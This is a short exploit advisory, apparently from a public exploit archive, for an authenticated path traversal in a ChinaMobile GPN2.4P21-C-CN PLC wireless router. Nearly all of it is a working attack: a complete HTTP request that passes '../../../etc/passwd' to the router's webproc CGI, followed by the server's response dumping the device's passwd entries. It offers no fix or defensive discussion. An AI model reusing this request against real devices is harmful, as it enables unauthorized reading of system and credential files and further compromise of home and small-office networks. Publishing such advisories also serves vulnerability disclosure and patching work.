PLC Wireless Router GPN2.4P21-C-CN File Disclosure
Posted on 30 August 2016
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure # Date: 28/08/2016 # Exploit Author: Rahul Raz # Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00 #Vendor: ChinaMobile # Tested on: Ubuntu Linux _____________________________________________________ GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected Host: 192.168.59.254 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: sessionid=64857d81 Connection: keep-alive Response HTTP/1.0 200 OK Connection: close Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ #root:x:0:0:root:/root:/bin/bash #root:x:0:0:root:/root:/bin/sh #root:x:0:0:root:/root:/usr/bin/cmd #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh